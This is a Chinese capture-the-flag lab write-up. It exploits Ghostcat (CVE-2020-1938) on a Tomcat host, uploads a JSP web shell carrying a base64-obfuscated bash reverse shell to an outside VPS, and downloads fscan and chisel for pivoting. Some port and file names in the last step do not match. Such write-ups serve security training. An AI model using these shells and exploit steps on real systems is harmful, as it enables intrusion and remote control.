春秋云境 Spoofing
flag1
考点:CNVD-2020-10487(CVE-2020-1938)
1
|
fscan.exe -h 39.99.146.129
|
扫到一个后台
发现都是前端页面,dirsearch扫一下
发现是Tomcat 9.0.30
直接搜发现一个漏洞CNVD-2020-10487(CVE-2020-1938),先利用下面的工具读取文件
https://github.com/00theway/Ghostcat-CNVD-2020-10487
1
|
python ajpShooter.py http://39.99.146.129:8080/ 8009 /WEB-INF/web.xml read
|
发现文件上传功能
1
|
http://39.99.146.129:8080/UploadServlet
|
上传一个反弹shell马
1
2
3
4
5
6
7
8
9
10
|
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAwLjM5LjE5My81MDAwIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
|
得到路径
1
|
/upload/f33d8d3ab73df2e78d949cb4584d29ba/20251016094954432.txt
|
然后继续用那个工具进行代码执行
1
|
python ajpShooter.py http://39.99.146.129:8080/ 8009 /upload/f33d8d3ab73df2e78d949cb4584d29ba/20251016094954432.txt eval
|
命令执行拿flag就行
flag2
先在vps起一个python服务,让受控主机下载一下fscan和chisel工具 进行内网扫描以及代理搭建
1
|
python3 -m http.server 5000
|
1
2
3
4
|
wget http://101.200.39.193:8080/fscan
wget http://101.200.39.193:8080/linux_x64_admin
chmod +x fscan
chmod +x chisel
|